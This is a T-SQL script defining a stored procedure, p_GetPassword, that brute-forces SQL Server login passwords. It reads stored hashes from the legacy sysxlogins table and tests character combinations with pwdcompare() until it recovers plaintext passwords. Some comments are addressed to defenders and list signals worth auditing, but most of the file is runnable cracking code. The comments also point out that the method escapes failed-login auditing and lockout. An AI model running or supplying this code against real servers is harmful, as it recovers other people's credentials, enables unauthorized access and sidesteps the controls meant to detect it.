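-- Remove any earlier copy of dbo.p_GetPassword so that the CREATE PROC in the
-- following batch starts from a clean state. The stray scraper watermark
-- tokens that trailed these two statements were not T-SQL and have been
-- dropped; the statements themselves are unchanged.
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO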
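/*-- p_GetPassword: exhaustive (brute-force) check of SQL Server login passwords

What it does
  Reads login names and stored password hashes from master.dbo.sysxlogins and
  tests every character combination up to a given length against each hash
  with pwdcompare(). Handles Chinese text, special characters and passwords
  with trailing spaces. Because such passwords do not print well, the result
  also lists the character codes that make up each recovered password.

Cost
  Each extra password position adds one more 255-row cross join of #t, so the
  work grows as 255^length per login. In the original author's words it can
  reach any length "if the machine and the time are sufficient"; in practice
  only short passwords fall, which is what password-length policy relies on.

Notes for reviewers and defenders
  - The hashes are compared inside the server with pwdcompare(); no login
    attempt is made, so failed-login auditing and lockout do not observe it.
  - It needs read access to the password column of master.dbo.sysxlogins, a
    legacy system table (SQL Server 2000 era). Who holds that access is the
    control that matters: keep it limited to administrators.
  - Signals worth auditing: creation of a procedure like this one, ad-hoc
    calls to pwdcompare(), reads of sysxlogins, and long-running tempdb
    cross joins.
  - Logins whose password column is NULL are reported with an empty password
    without any search.

Usage example
  exec p_GetPassword
--*/
create proc p_GetPassword
@username sysname=null, -- login to test; when omitted, every login is listed
@pwdlen int=2 -- longest password length to try (default: 2 characters or fewer)
as
-- The first pass below already covers length 1 and each loop pass adds one
-- position, so the loop bound is @pwdlen-1. NULL or values below 1 become 1,
-- which still searches lengths 1 and 2.
set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

-- #t: character codes 0..254, one row per candidate character.
select top 255 id=identity(int,0,1) into #t from syscolumns
alter table #t add constraint PK_#t primary key(id)

-- #pwd: one work row per login.
--   type   : passed to pwdcompare() as its third argument, taken from bit
--            2048 of xstatus (presumably marks an older hash format; confirm)
--   jm     : 1 = nothing left to do (no password stored, or already matched)
--   pwdstr : recovered password text
--   pwd    : the same password as a comma-separated list of character codes
-- NOTE(review): "srvid is null" presumably restricts the scan to local logins
-- rather than linked-server mappings; confirm against the table definition.
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null then 1 else 0 end
,pwdstr=cast('' as sysname)
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)

-- Fragments of the dynamic statement, extended by one position per pass:
--   @s1 : candidate string expression  char(aa.id)+char(ab.id)+...
--   @s2 : the matching code list       cast(aa.id as varchar)+','+...
--   @s3 : the cross-joined copies of #t (aliases aa, ab, ac, ...)
-- All three are built from the loop counter only; no caller-supplied text is
-- concatenated into the executed SQL.
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
declare @l int
select @l=0
,@s1='char(aa.id)'
,@s2='cast(aa.id as varchar)'
,@s3=',#t aa'
-- Pass 0: single-character candidates.
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
-- Add one position per pass until every login is resolved or the length
-- bound is reached.
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)
begin
-- The two-letter alias for the new #t copy is derived from @l (aa, ab, ...).
select @l=@l+1
,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
exec('
update pwd set jm=1,pwdstr='+@s1+'
,pwd='+@s2+'
from #pwd pwd'+@s3+'
where pwd.jm=0
and pwdcompare('+@s1+',pwd.password,pwd.type)=1
')
end

-- Result set: login name, recovered password, and its character codes.
-- The column aliases are part of the output and are kept as the author wrote
-- them. Rows that were not matched within the length bound keep an empty
-- pwdstr.
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go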